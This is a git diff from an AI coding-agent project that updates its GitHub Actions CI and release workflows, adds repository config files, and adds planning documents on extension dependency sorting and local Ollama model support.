diff --git a/.dockerignore b/.dockerignore new file mode 100644 index 000000000..444ee5c7f --- /dev/null +++ b/.dockerignore @@ -0,0 +1,53 @@ +# ── Build artifacts ── +dist/ +build/ +coverage/ +*.tsbuildinfo + +# ── Dependencies ── +node_modules/ +packages/*/node_modules/ + +# ── Environment & secrets ── +.env +.env.* +!.env.example +.gsd/ + +# ── IDE & OS ── +.idea/ +.vscode/ +*.code-workspace +.DS_Store +Thumbs.db + +# ── Git ── +.git/ +.github/ + +# ── Development files ── +.claude/ +.plans/ +.artifacts/ +.bg-shell/ +.bg_shell +*.log +*.swp +*.swo +*~ +tmp/ +.cache/ + +# ── Native build artifacts ── +native/ +target/ + +# ── Test fixtures ── +tests/ + +# ── Lock files (npm is canonical via package-lock.json) ── +pnpm-lock.yaml +bun.lock + +# ── Tarballs ── +*.tgz diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS new file mode 100644 index 000000000..f54b9a409 --- /dev/null +++ b/.github/CODEOWNERS @@ -0,0 +1,36 @@ +# CODEOWNERS +# Defines required reviewers per path. GitHub enforces these on PRs. +# https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/customizing-your-repository/about-code-owners +# +# Format: <pattern> <@user or @org/team> +# Last matching rule wins. 
+ +# Default: maintainers review everything not explicitly matched below +* @gsd-build/maintainers + +# Core agent orchestration — RFC required, senior review only +packages/pi-agent-core/ @gsd-build/maintainers +src/resources/extensions/gsd/ @gsd-build/maintainers + +# AI/LLM provider integrations +packages/pi-ai/ @gsd-build/maintainers + +# Terminal UI +packages/pi-tui/ @gsd-build/maintainers + +# Native bindings — platform-specific, needs careful review +native/ @gsd-build/maintainers + +# CI/CD and release pipeline — high blast radius +.github/ @gsd-build/maintainers +scripts/ @gsd-build/maintainers +Dockerfile @gsd-build/maintainers + +# Security-sensitive files — always require maintainer sign-off +.secretscanignore @gsd-build/maintainers +scripts/secret-scan.sh @gsd-build/maintainers +scripts/install-hooks.sh @gsd-build/maintainers + +# Contributor-facing docs — keep accurate, maintainers approve +CONTRIBUTING.md @gsd-build/maintainers +VISION.md @gsd-build/maintainers diff --git a/.github/workflows/ai-triage.yml b/.github/workflows/ai-triage.yml index b07fc8c46..04bc87ae8 100644 --- a/.github/workflows/ai-triage.yml +++ b/.github/workflows/ai-triage.yml @@ -12,9 +12,9 @@ permissions: jobs: triage: - runs-on: ubuntu-latest + runs-on: blacksmith-4vcpu-ubuntu-2404 steps: - - uses: actions/checkout@v4 + - uses: actions/checkout@v6 with: sparse-checkout: | VISION.md @@ -96,41 +96,47 @@ jobs: Be generous in your assessment — only flag clear violations. Ambiguous cases should be marked as aligned. 
Do NOT flag issues/PRs that are legitimately reporting bugs or requesting features, even if they could be better written.`; - const response = await fetch('https://api.anthropic.com/v1/messages', { - method: 'POST', - headers: { - 'x-api-key': process.env.ANTHROPIC_API_KEY, - 'content-type': 'application/json', - 'anthropic-version': '2023-06-01' - }, - body: JSON.stringify({ - model: 'claude-haiku-4-5-20251001', - max_tokens: 1024, - messages: [{ role: 'user', content: prompt }] - }) - }); - - if (!response.ok) { - const err = await response.text(); - core.setFailed(`Anthropic API error: ${response.status} ${err}`); - return; - } - - const data = await response.json(); - const text = data.content[0].text; - - // Extract JSON from response (handle markdown code blocks) - const jsonMatch = text.match(/\{[\s\S]*\}/); - if (!jsonMatch) { - core.setFailed(`Could not parse Claude response: ${text}`); + if (!process.env.ANTHROPIC_API_KEY) { + core.warning('Skipping AI triage because ANTHROPIC_API_KEY is not configured.'); return; } let result; try { + const response = await fetch('https://api.anthropic.com/v1/messages', { + method: 'POST', + headers: { + 'x-api-key': process.env.ANTHROPIC_API_KEY, + 'content-type': 'application/json', + 'anthropic-version': '2023-06-01' + }, + body: JSON.stringify({ + model: 'claude-haiku-4-5-20251001', + max_tokens: 1024, + messages: [{ role: 'user', content: prompt }] + }), + signal: AbortSignal.timeout(20000) + }); + + if (!response.ok) { + const err = await response.text(); + core.warning(`Skipping AI triage after Anthropic API error: ${response.status} ${err}`); + return; + } + + const data = await response.json(); + const text = data.content?.[0]?.text ?? 
''; + + // Extract JSON from response (handle markdown code blocks) + const jsonMatch = text.match(/\{[\s\S]*\}/); + if (!jsonMatch) { + core.warning(`Skipping AI triage because the model response was not parseable JSON: ${text}`); + return; + } + result = JSON.parse(jsonMatch[0]); } catch (e) { - core.setFailed(`JSON parse error: ${e.message}\nRaw text: ${text}`); + core.warning(`Skipping AI triage after unexpected failure: ${e.message}`); return; } core.info(`Triage result: ${JSON.stringify(result, null, 2)}`); diff --git a/.github/workflows/build-native.yml b/.github/workflows/build-native.yml index 3d3bcd9b9..6de0db41f 100644 --- a/.github/workflows/build-native.yml +++ b/.github/workflows/build-native.yml @@ -46,8 +46,9 @@ jobs: - name: Install Rust toolchain uses: dtolnay/rust-toolchain@stable - with: - targets: ${{ matrix.target }} + + - name: Add Rust compilation target + run: rustup target add ${{ matrix.target }} - name: Cache Rust build artifacts uses: Swatinem/rust-cache@v2 @@ -97,7 +98,7 @@ jobs: publish: needs: build if: startsWith(github.ref, 'refs/tags/v') || github.event.inputs.publish == 'true' - runs-on: ubuntu-latest + runs-on: blacksmith-4vcpu-ubuntu-2404 name: Publish platform packages steps: diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 30bfa4a6f..17351ebb2 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -1,3 +1,4 @@ +# CI workflow — builds, tests, and gates merges to main name: CI on: @@ -24,7 +25,8 @@ concurrency: jobs: detect-changes: - runs-on: ubuntu-latest + timeout-minutes: 2 + runs-on: blacksmith-4vcpu-ubuntu-2404 outputs: docs-only: ${{ steps.check.outputs.docs-only }} steps: @@ -59,7 +61,8 @@ jobs: fi docs-check: - runs-on: ubuntu-latest + timeout-minutes: 5 + runs-on: blacksmith-4vcpu-ubuntu-2404 needs: detect-changes steps: - uses: actions/checkout@v6 @@ -70,8 +73,9 @@ jobs: run: bash scripts/docs-prompt-injection-scan.sh --diff origin/main lint: + timeout-minutes: 5 needs: 
detect-changes - runs-on: ubuntu-latest + runs-on: blacksmith-4vcpu-ubuntu-2404 steps: - uses: actions/checkout@v6 with: @@ -80,6 +84,9 @@ jobs: - name: Scan for hardcoded secrets run: bash scripts/secret-scan.sh --diff origin/main + - name: Scan for base64-encoded secrets + run: bash scripts/base64-scan.sh --diff origin/main + - name: Ensure .gsd/ is not checked in run: | if [ -d ".gsd" ]; then @@ -95,10 +102,17 @@ jobs: - name: Validate skill references run: node scripts/check-skill-references.mjs + - name: Require tests with source changes + if: github.event_name == 'pull_request' + env: + PR_BASE_SHA: ${{ github.event.pull_request.base.sha }} + run: bash scripts/require-tests.sh + build: + timeout-minutes: 15 needs: detect-changes if: needs.detect-changes.outputs.docs-only != 'true' - runs-on: ubuntu-latest + runs-on: blacksmith-4vcpu-ubuntu-2404 steps: - name: Checkout repository @@ -131,15 +145,21 @@ jobs: - name: Run unit tests run: npm run test:unit + - name: Run package tests + run: npm run test:packages + - name: Run integration tests run: npm run test:integration + - name: Check test coverage thresholds + run: npm run test:coverage + windows-portability: + timeout-minutes: 15 needs: detect-changes if: >- - needs.detect-changes.outputs.docs-only != 'true' && - github.event_name == 'push' && github.ref == 'refs/heads/main' - runs-on: windows-latest + needs.detect-changes.outputs.docs-only != 'true' + runs-on: blacksmith-4vcpu-windows-2025 steps: - name: Checkout repository @@ -162,3 +182,70 @@ jobs: - name: Run unit tests run: npm run test:unit + + - name: Run package tests + run: npm run test:packages + + rtk-portability: + timeout-minutes: 20 + needs: detect-changes + if: needs.detect-changes.outputs.docs-only != 'true' + strategy: + fail-fast: false + matrix: + include: + - label: linux + os: blacksmith-4vcpu-ubuntu-2404 + - label: windows + os: blacksmith-4vcpu-windows-2025 + - label: macos + os: macos-15 + runs-on: ${{ matrix.os }} + + steps: + - 
name: Checkout repository + uses: actions/checkout@v6 + + - name: Setup Node.js + uses: actions/setup-node@v6 + with: + node-version: '24' + cache: 'npm' + + - name: Install dependencies + env: + PLAYWRIGHT_SKIP_BROWSER_DOWNLOAD: '1' + run: npm ci + + - name: Validate managed RTK install + run: >- + node --experimental-strip-types --input-type=module -e + "const mod = await import('./src/rtk.ts'); + const path = mod.getManagedRtkPath(process.platform); + if (!mod.validateRtkBinary(path)) { + console.error('Managed RTK validation failed:', path); + process.exit(1); + } + console.log('Managed RTK validated at', path);" + + - name: Run RTK-focused portability tests + run: >- + node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs + --experimental-strip-types --experimental-test-isolation=process --test + src/tests/rtk.test.ts + src/tests/rtk-execution-seams.test.ts + src/tests/postinstall.test.ts + src/tests/app-smoke.test.ts + src/resources/extensions/gsd/tests/custom-verification.test.ts + src/resources/extensions/gsd/tests/verification-gate.test.ts + + - name: Generate RTK benchmark evidence + if: matrix.label == 'linux' + run: node scripts/rtk-benchmark.mjs --output .artifacts/rtk-benchmark.md + + - name: Upload RTK benchmark artifact + if: matrix.label == 'linux' + uses: actions/upload-artifact@v4 + with: + name: rtk-benchmark-linux + path: .artifacts/rtk-benchmark.md diff --git a/.github/workflows/cleanup-dev-versions.yml b/.github/workflows/cleanup-dev-versions.yml index ca8896a20..7225a22ea 100644 --- a/.github/workflows/cleanup-dev-versions.yml +++ b/.github/workflows/cleanup-dev-versions.yml @@ -11,7 +11,7 @@ permissions: jobs: cleanup: name: Remove stale -dev versions - runs-on: ubuntu-latest + runs-on: blacksmith-4vcpu-ubuntu-2404 steps: - uses: actions/setup-node@v6 with: diff --git a/.github/workflows/pipeline.yml b/.github/workflows/pipeline.yml index dc5a48b20..75ad95508 100644 --- a/.github/workflows/pipeline.yml +++ 
b/.github/workflows/pipeline.yml @@ -7,7 +7,7 @@ on: branches: [main] concurrency: - group: pipeline-${{ github.sha }} + group: pipeline-main cancel-in-progress: false permissions: @@ -18,7 +18,7 @@ jobs: dev-publish: name: Dev Publish if: ${{ github.event.workflow_run.conclusion == 'success' }} - runs-on: ubuntu-latest + runs-on: blacksmith-4vcpu-ubuntu-2404 container: image: ghcr.io/gsd-build/gsd-ci-builder:latest credentials: @@ -71,7 +71,7 @@ jobs: test-verify: name: Test & Verify needs: dev-publish - runs-on: ubuntu-latest + runs-on: blacksmith-4vcpu-ubuntu-2404 steps: - uses: actions/checkout@v6 @@ -81,8 +81,15 @@ jobs: registry-url: https://registry.npmjs.org cache: 'npm' - - name: Install gsd-pi@dev globally - run: npm install -g gsd-pi@dev + - name: Install gsd-pi@dev globally (with registry propagation retry) + run: | + for i in 1 2 3 4 5 6; do + npm install -g gsd-pi@dev && exit 0 + echo "Attempt $i failed — waiting 10s for npm registry propagation..." + sleep 10 + done + echo "Failed to install gsd-pi@dev after 6 attempts" + exit 1 - name: Run smoke tests (against installed binary) run: | @@ -129,7 +136,7 @@ jobs: prod-release: name: Production Release needs: [dev-publish, test-verify] - runs-on: ubuntu-latest + runs-on: blacksmith-4vcpu-ubuntu-2404 environment: prod steps: - uses: actions/checkout@v6 @@ -180,6 +187,7 @@ jobs: git add package.json package-lock.json CHANGELOG.md native/npm/*/package.json pkg/package.json packages/pi-coding-agent/package.json git commit -m "release: v${RELEASE_VERSION}" git tag "v${RELEASE_VERSION}" + git pull --rebase origin main git push origin main git push origin "v${RELEASE_VERSION}" @@ -240,7 +248,7 @@ jobs: update-builder: name: Update CI Builder Image if: ${{ github.event.workflow_run.conclusion == 'success' }} - runs-on: ubuntu-latest + runs-on: blacksmith-4vcpu-ubuntu-2404 steps: - uses: actions/checkout@v6 with: diff --git a/.github/workflows/pr-risk.yml b/.github/workflows/pr-risk.yml index 
bde087b7a..2b96c9bb9 100644 --- a/.github/workflows/pr-risk.yml +++ b/.github/workflows/pr-risk.yml @@ -14,19 +14,19 @@ permissions: jobs: risk-check: name: Classify changed files and assess risk - runs-on: ubuntu-latest + runs-on: blacksmith-4vcpu-ubuntu-2404 steps: # Checkout the BASE branch — our trusted script and map, not fork code. - name: Checkout base - uses: actions/checkout@v4 + uses: actions/checkout@v6 with: ref: ${{ github.base_ref }} - name: Setup Node.js - uses: actions/setup-node@v4 + uses: actions/setup-node@v6 with: - node-version: '20' + node-version: '24' # Use the GitHub API to get changed files — no fork code is executed. - name: Get changed files @@ -44,14 +44,14 @@ id: risk run: | REPORT=$(cat /tmp/changed-files.txt | node scripts/pr-risk-check.mjs --github || true) - echo "report<<EOF" >> $GITHUB_OUTPUT - echo "$REPORT" >> $GITHUB_OUTPUT - echo "EOF" >> $GITHUB_OUTPUT + echo "report<<EOF" >> "$GITHUB_OUTPUT" + echo "$REPORT" >> "$GITHUB_OUTPUT" + echo "EOF" >> "$GITHUB_OUTPUT" RISK_LEVEL=$(cat /tmp/changed-files.txt | node scripts/pr-risk-check.mjs --json 2>/dev/null \ | node -e "let d=''; process.stdin.on('data',c=>d+=c); process.stdin.on('end',()=>{ try { console.log(JSON.parse(d).risk) } catch { console.log('low') } })" \ || echo "low") - echo "level=$RISK_LEVEL" >> $GITHUB_OUTPUT + echo "level=$RISK_LEVEL" >> "$GITHUB_OUTPUT" - name: Write step summary run: echo "${{ steps.risk.outputs.report }}" >> $GITHUB_STEP_SUMMARY diff --git a/.github/workflows/regenerate-models.yml b/.github/workflows/regenerate-models.yml new file mode 100644 index 000000000..f68251158 --- /dev/null +++ b/.github/workflows/regenerate-models.yml @@ -0,0 +1,43 @@ +# Regenerates models.generated.ts from live provider APIs weekly. +# Opens a PR automatically if the model list has changed. 
+name: Regenerate model registry + +on: + schedule: + - cron: '0 6 * * 1' # Every Monday at 06:00 UTC + workflow_dispatch: # Allow manual trigger + +permissions: + contents: write + pull-requests: write + +jobs: + regenerate: + runs-on: blacksmith-4vcpu-ubuntu-2404 + timeout-minutes: 15 + steps: + - uses: actions/checkout@v6 + + - uses: actions/setup-node@v4 + with: + node-version: '22' + cache: 'npm' + + - name: Install dependencies + run: npm ci + + - name: Regenerate model registry + run: npx tsx packages/pi-ai/scripts/generate-models.ts + + - name: Open PR if changed + uses: peter-evans/create-pull-request@v7 + with: + commit-message: 'chore(pi-ai): regenerate model registry from upstream APIs' + title: 'chore(pi-ai): regenerate model registry from upstream APIs' + body: | + Automated weekly regeneration of `models.generated.ts` from live provider APIs. + + Run `packages/pi-ai/scripts/generate-models.ts` — no logic changed, output only. + branch: chore/auto-regenerate-models + labels: chore + delete-branch: true diff --git a/.gitignore b/.gitignore index 465c44380..5862cc861 100644 --- a/.gitignore +++ b/.gitignore @@ -1,4 +1,17 @@ +# ── Compiled test output ── +dist-test/ + +# ── Compiled output in src/ (should only contain .ts source) ── +src/**/*.js +src/**/*.js.map +src/**/*.d.ts +src/**/*.d.ts.map +!src/**/*.test.js + +# ── Repowise index (local machine-generated cache) ── +.repowise/ + # ── GSD project state (development-only, lives in worktree branches) ── package-lock.json .claude/ @@ -39,6 +52,9 @@ tmp/ packages/*/dist/ packages/*/node_modules/ +# ── Scratch/WIP files ── +preflight-script.ts + # ── GSD baseline (auto-generated) ── dist/ !/pkg/dist/modes/ @@ -52,6 +68,7 @@ TODOS.md .planning/ .audits/ docs/coherence-audit/ +.plans/ # ── GSD project state (per-worktree, never committed) ── .gsd/ @@ -62,3 +79,6 @@ bun.lock # ── GSD baseline (auto-generated) ── .gsd + +# ── GSD baseline (auto-generated) ── +.gsd-id diff --git a/.mcp.json b/.mcp.json new 
file mode 100644 index 000000000..a8e68079d --- /dev/null +++ b/.mcp.json @@ -0,0 +1,14 @@ +{ + "mcpServers": { + "repowise": { + "command": "repowise", + "args": [ + "mcp", + "/Users/jeremymcspadden/Github/gsd-2", + "--transport", + "stdio" + ], + "description": "repowise: codebase intelligence \u2014 docs, graph, git signals, dead code, decisions" + } + } +} diff --git a/.npmrc b/.npmrc new file mode 100644 index 000000000..b6f27f135 --- /dev/null +++ b/.npmrc @@ -0,0 +1 @@ +engine-strict=true diff --git a/PLAN.md b/.plans/doctor-cleanup-consolidation.md similarity index 100% rename from PLAN.md rename to .plans/doctor-cleanup-consolidation.md diff --git a/.plans/extension-loading-multi-path.md b/.plans/extension-loading-multi-path.md new file mode 100644 index 000000000..1cc76f735 --- /dev/null +++ b/.plans/extension-loading-multi-path.md @@ -0,0 +1,138 @@ +# Extension Loading: Dependency Sort + Unified Enable/Disable + +## Context + +GSD-2 has a well-structured extension system with three discovery paths (bundled, global/community, project-local) that are **already wired up** through pi's `DefaultPackageManager.addAutoDiscoveredResources()`. However, two critical gaps remain: + +1. `sortExtensionPaths()` (topological dependency sort) is implemented but **never called** — `dependencies.extensions` in manifests is decorative +2. 
The GSD extension registry (enable/disable) only applies to **bundled** extensions — community extensions bypass it entirely + +### Architecture (Current Flow) + +``` +GSD loader.ts + → discoverExtensionEntryPaths(bundledExtDir) + → filter by GSD registry (isExtensionEnabled) + → set GSD_BUNDLED_EXTENSION_PATHS env var + ↓ +DefaultResourceLoader.reload() + → packageManager.resolve() + → addAutoDiscoveredResources() + → project: cwd/.gsd/extensions/ (CONFIG_DIR_NAME = ".gsd") + → global: ~/.gsd/agent/extensions/ (includes synced bundled) + → loadExtensions(mergedPaths) ← NO sort, NO registry check on community +``` + +### Key Files + +| File | Role | +|------|------| +| `src/loader.ts` (lines 146-161) | GSD startup — bundled discovery + registry filter | +| `src/extension-sort.ts` | Topological sort (Kahn's BFS) — EXISTS but NEVER CALLED | +| `src/extension-registry.ts` | Registry I/O, enable/disable, tier checks | +| `src/resource-loader.ts` (lines 589-607) | `buildResourceLoader()` — constructs DefaultResourceLoader | +| `packages/pi-coding-agent/src/core/resource-loader.ts` (lines 311-395) | `reload()` — merges paths, calls `loadExtensions()` | +| `packages/pi-coding-agent/src/core/package-manager.ts` (lines 1585-1700) | `addAutoDiscoveredResources()` — auto-discovers from .gsd/ dirs | +| `packages/pi-coding-agent/src/core/extensions/loader.ts` (lines 945-1002) | `discoverAndLoadExtensions()` — DEAD CODE, never invoked | + +--- + +## Plan + +### Task 1: Wire topological sort into extension loading + +**What:** Call `sortExtensionPaths()` on the merged extension paths before passing them to `loadExtensions()`. 
+ +**Where:** `packages/pi-coding-agent/src/core/resource-loader.ts` ~line 381-385 + +**Before:** +```typescript +const extensionsResult = await loadExtensions(extensionPaths, this.cwd, this.eventBus); +``` + +**After:** +```typescript +import { sortExtensionPaths } from '../../../src/extension-sort.js'; + +const { sortedPaths, warnings } = sortExtensionPaths(extensionPaths); +for (const w of warnings) { + // emit as diagnostic, not hard error +} +const extensionsResult = await loadExtensions(sortedPaths, this.cwd, this.eventBus); +``` + +**Consideration:** `sortExtensionPaths` lives in `src/` (GSD side), not in `packages/pi-coding-agent/`. Need to either: +- (a) Move it into pi-coding-agent as a shared utility, OR +- (b) Import it cross-package (already done for other GSD→pi imports), OR +- (c) Call it on the GSD side before paths reach pi — harder since auto-discovered paths are added inside pi's package manager + +Option (a) is cleanest — the sort logic only depends on `readManifestFromEntryPath` which is also in `src/extension-registry.ts` but could be duplicated or shared. + +### Task 2: Apply GSD registry to community extensions + +**What:** When `buildResourceLoader()` in `src/resource-loader.ts` constructs the DefaultResourceLoader, also discover and filter community extensions from `~/.gsd/agent/extensions/` through the GSD registry — same as it already does for `~/.pi/agent/extensions/` paths. 
+ +**Where:** `src/resource-loader.ts` → `buildResourceLoader()` (lines 589-607) + +**Current code already filters pi extensions:** +```typescript +const piExtensionPaths = discoverExtensionEntryPaths(piExtensionsDir) + .filter((entryPath) => !bundledKeys.has(getExtensionKey(entryPath, piExtensionsDir))) + .filter((entryPath) => { + const manifest = readManifestFromEntryPath(entryPath) + if (!manifest) return true + return isExtensionEnabled(registry, manifest.id) + }) +``` + +**Add similar filtering for community extensions in agentDir:** +- Discover extensions in `~/.gsd/agent/extensions/` that are NOT bundled +- Filter through `isExtensionEnabled(registry, manifest.id)` +- Pass as disabled (via override patterns or pre-filtering) to the resource loader + +**Alternative approach:** Hook into `addAutoDiscoveredResources` or the `addResource` call to check the GSD registry. This might be cleaner since the auto-discovery already happens inside pi's package manager. + +### Task 3: Emit sort warnings as diagnostics + +**What:** Surface dependency warnings (missing deps, cycles) through GSD's diagnostic system so users see them. + +**Where:** Wherever the sort is invoked from Task 1. + +**Format:** +``` +⚠ Extension 'gsd-watch' declares dependency 'gsd' which is not installed — loading anyway +⚠ Extensions 'foo' and 'bar' form a dependency cycle — loading in alphabetical order +``` + +### Task 4: Clean up dead code + +**What:** The `discoverAndLoadExtensions()` function in `packages/pi-coding-agent/src/core/extensions/loader.ts` (lines 945-1002) is exported but never invoked. The project-local trust model inside it (`getUntrustedExtensionPaths`) also never runs. + +**Options:** +- (a) Remove it entirely — it's dead +- (b) Mark deprecated — in case upstream pi uses it +- (c) Leave it — lowest risk + +Recommend (b) for now — add `@deprecated` JSDoc so it doesn't grow new callers. 
+ +### Task 5: Tests + +- **Sort integration test:** Create two extensions where A depends on B. Verify B loads before A after sort. +- **Registry community test:** Drop a community extension in `~/.gsd/agent/extensions/`, run `gsd extensions disable <extension-id>`, verify it doesn't load. +- **Conflict test:** Same extension ID in project-local and global — verify project-local wins. +- **Missing dep test:** Extension declares dependency on non-existent extension — verify warning emitted, extension still loads. +- **Cycle test:** Two extensions that depend on each other — verify warning, both load. + +--- + +## Follow-up PR (separate) + +**Subagent extension forwarding:** Update `src/resources/extensions/subagent/index.ts` to forward ALL extension paths (not just bundled) to child processes. May need a second env var like `GSD_COMMUNITY_EXTENSION_PATHS` or consolidate into `GSD_EXTENSION_PATHS`. + +--- + +## Open Questions + +1. **Where should `sortExtensionPaths` live?** Currently in `src/` (GSD side). Needs to be callable from pi's resource-loader. Options: move to pi, keep and import cross-package, or duplicate. +2. **Should community extensions respect the same registry as bundled?** Or should they have their own enable/disable mechanism? Current plan unifies them. +3. **Project-local trust:** The TOFU model in the dead `discoverAndLoadExtensions()` never runs. Should `addAutoDiscoveredResources` also gate project-local extensions behind trust? Or is `.gsd/extensions/` in your own project always trusted? 
diff --git a/.plans/issue-575-dynamic-model-routing.md b/.plans/issue-575-dynamic-model-routing.md index c68eab6bf..b32190405 100644 --- a/.plans/issue-575-dynamic-model-routing.md +++ b/.plans/issue-575-dynamic-model-routing.md @@ -11,7 +11,7 @@ Users on capped plans (e.g., Claude Pro) exhaust weekly token limits in 15-20 ho ## Current Architecture ### What Exists -- **Phase-based model config:** Users can set different models per phase via `preferences.md` (research, planning, execution, completion) +- **Phase-based model config:** Users can set different models per phase via `PREFERENCES.md` (research, planning, execution, completion) - **Fallback chains:** Each phase supports `fallbacks: [model1, model2]` for error recovery - **Pre-dispatch hooks:** `PreDispatchResult` has a `model` field but it's **never applied** in `auto.ts` — this is a ready-made extension point - **Model registry:** `ModelRegistry.getAvailable()` provides all configured models with metadata diff --git a/web/left-native-tui-main-session-plan.md b/.plans/left-native-tui-main-session-plan.md similarity index 100% rename from web/left-native-tui-main-session-plan.md rename to .plans/left-native-tui-main-session-plan.md diff --git a/.plans/ollama-native-provider.md b/.plans/ollama-native-provider.md new file mode 100644 index 000000000..312743c95 --- /dev/null +++ b/.plans/ollama-native-provider.md @@ -0,0 +1,241 @@ +# Ollama Extension — First-Class Local LLM Support + +## Status: DRAFT — Awaiting approval + +## Problem + +Ollama support in GSD2 currently requires manual `models.json` configuration. Users must: +1. Know the OpenAI-compatibility endpoint (`localhost:11434/v1`) +2. Manually list every model they want to use +3. Set compat flags (`supportsDeveloperRole: false`, etc.) +4. Use a dummy API key + +There's an `ollama-cloud` provider for hosted Ollama, and a discovery adapter that can list models, but no first-class **local Ollama** extension that "just works." 
+ +## Goal + +Make Ollama the easiest way to use GSD2 — zero config when Ollama is running locally. All Ollama functionality lives in a single extension: `src/resources/extensions/ollama/`. + +## Architecture + +Everything is a self-contained extension under `src/resources/extensions/ollama/`. The extension: +- Auto-detects Ollama on startup via health check +- Discovers and registers local models with the model registry +- Provides native Ollama API streaming (not OpenAI shim) +- Exposes `/ollama` slash commands for model management +- Registers an LLM-callable tool for model pull/status + +Minimal core changes — only `KnownProvider` and `KnownApi` type additions in `pi-ai`, and `env-api-keys.ts` for key resolution. Everything else is in the extension. + +## File Structure + +``` +src/resources/extensions/ollama/ +├── index.ts # Extension entry — wires everything on session_start +├── ollama-client.ts # HTTP client for Ollama REST API (/api/*) +├── ollama-discovery.ts # Model discovery + capability detection +├── ollama-provider.ts # Native /api/chat streaming provider (registers with pi-ai) +├── ollama-commands.ts # /ollama slash commands (status, pull, list, remove, ps) +├── ollama-tool.ts # LLM-callable tool for model management +├── model-capabilities.ts # Known model capability table (context window, vision, reasoning) +└── types.ts # Shared types for Ollama API responses +``` + +## Scope + +### Phase 1: Auto-Discovery + OpenAI-Compat Routing + +**What:** Extension that auto-detects Ollama, discovers models, registers them using the existing `openai-completions` API provider. Zero config needed. + +**Extension files:** +- `ollama/index.ts` — Main entry. On `session_start`: + 1. Probe `localhost:11434` (or `OLLAMA_HOST`) with 1.5s timeout + 2. If reachable, discover models via `/api/tags` + 3. Register discovered models with `ctx.modelRegistry` using correct defaults + 4. 
Show status widget if Ollama is detected +- `ollama/ollama-client.ts` — Low-level HTTP client: + - `isRunning()` — `GET /` health check + - `getVersion()` — `GET /api/version` + - `listModels()` — `GET /api/tags` + - `showModel(name)` — `POST /api/show` (details, template, parameters, size) + - `getRunningModels()` — `GET /api/ps` (loaded models, VRAM usage) + - `pullModel(name, onProgress)` — `POST /api/pull` (streaming progress) + - `deleteModel(name)` — `DELETE /api/delete` + - `copyModel(source, dest)` — `POST /api/copy` + - Respects `OLLAMA_HOST` env var for non-default endpoints +- `ollama/ollama-discovery.ts` — Enhanced model discovery: + - Calls `/api/tags` to get model list + - Calls `/api/show` per model (batch, cached) to get: + - `details.parameter_size` → estimate context window + - `details.families` → detect vision (clip), reasoning (deepseek-r1) + - `modelfile` → extract default parameters + - Returns enriched `DiscoveredModel[]` with proper capabilities +- `ollama/model-capabilities.ts` — Known model lookup table: + - Maps well-known model families to capabilities + - e.g., `llama3.1` → `{ contextWindow: 131072, input: ["text"] }` + - e.g., `llava` → `{ contextWindow: 4096, input: ["text", "image"] }` + - e.g., `deepseek-r1` → `{ reasoning: true, contextWindow: 131072 }` + - e.g., `qwen2.5-coder` → `{ contextWindow: 131072, input: ["text"] }` + - Fallback: estimate from parameter count if not in table +- `ollama/types.ts` — Ollama API response types + +**Core changes (minimal):** +- `packages/pi-ai/src/types.ts` — Add `"ollama"` to `KnownProvider` +- `packages/pi-ai/src/env-api-keys.ts` — Add `"ollama"` key resolution (returns `"ollama"` placeholder — no real key needed) +- `src/onboarding.ts` — Add `"ollama"` to provider selection list +- `src/wizard.ts` — Add `ollama` entry (no key required) + +**Model registration details:** +Each discovered model registers as: +```typescript +{ + id: "llama3.1:8b", // from /api/tags + name: "Llama 3.1 8B", // 
humanized + api: "openai-completions", // uses existing provider + provider: "ollama", + baseUrl: "http://localhost:11434/v1", + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + reasoning: false, // from capabilities table + input: ["text"], // from capabilities table + contextWindow: 131072, // from capabilities table or /api/show + maxTokens: 16384, // conservative default + compat: { + supportsDeveloperRole: false, + supportsReasoningEffort: false, + supportsUsageInStreaming: false, + maxTokensField: "max_tokens", + }, +} +``` + +**Behavior:** +- `gsd --list-models` shows all locally-pulled Ollama models automatically +- `/model ollama/llama3.1:8b` works without any config file +- If Ollama isn't running, extension is silent — no errors, no models listed +- `models.json` overrides still work (user config wins over auto-discovery) + +### Phase 2: Native Ollama API Provider (`/api/chat`) + +**What:** A dedicated streaming provider that talks Ollama's native protocol instead of the OpenAI compatibility shim. 
+ +**Extension files:** +- `ollama/ollama-provider.ts` — Native `/api/chat` streaming: + - Registers `"ollama-chat"` API with `registerApiProvider()` + - Implements `stream()` and `streamSimple()`: + - Maps GSD `Context` → Ollama messages format + - Maps GSD `Tool[]` → Ollama tool format + - Streams NDJSON responses, maps back to `AssistantMessage` events + - Extracts `` blocks for reasoning models (deepseek-r1, qwq) + - Ollama-specific options: + - `keep_alive` — control model memory retention (default: "5m") + - `num_ctx` — pass through model's context window + - `num_predict` — max output tokens + - Temperature, top_p, top_k + - Response metadata: + - `eval_count` / `eval_duration` → tokens/sec in usage stats + - `total_duration`, `load_duration` → performance visibility + - Vision support: converts image content to base64 for multimodal models + +**Core changes:** +- `packages/pi-ai/src/types.ts` — Add `"ollama-chat"` to `KnownApi` + +**Phase 1 models switch to `api: "ollama-chat"` by default.** Users can force OpenAI-compat via `models.json` override if needed. + +**Why native over OpenAI-compat:** +- Full `keep_alive` / `num_ctx` control +- Better error messages (Ollama-native vs generic OpenAI) +- More reliable tool calling on Ollama's native format +- Performance metrics in response (tokens/sec) +- Foundation for model management commands + +### Phase 3: Local LLM Management UX + +**What:** `/ollama` slash commands and an LLM tool for model management. 
+ +**Extension files:** +- `ollama/ollama-commands.ts` — Slash commands registered via `pi.registerCommand()`: +  - `/ollama` — Status overview: +    ``` +    Ollama v0.5.7 — running (localhost:11434) + +    Loaded: +      llama3.1:8b    4.7 GB VRAM    idle 3m + +    Available: +      llama3.1:8b        (4.7 GB) +      qwen2.5-coder:7b   (4.4 GB) +      deepseek-r1:8b     (4.9 GB) +    ``` +  - `/ollama pull <model>` — Pull with streaming progress via `ctx.ui.setWidget()` +  - `/ollama list` — List all local models with sizes and families +  - `/ollama remove <model>` — Delete a model (with confirmation) +  - `/ollama ps` — Running models + VRAM usage +- `ollama/ollama-tool.ts` — LLM-callable tool registered via `pi.registerTool()`: +  - `ollama_manage` tool — lets the agent pull/list/check models +  - Parameters: `{ action: "list" | "pull" | "status" | "ps", model?: string }` +  - Use case: agent detects it needs a model, pulls it automatically + +**UX Flow:** +``` +$ gsd +> /ollama +Ollama v0.5.7 — running (localhost:11434) +Loaded: +  llama3.1:8b — 4.7 GB VRAM, idle 3m 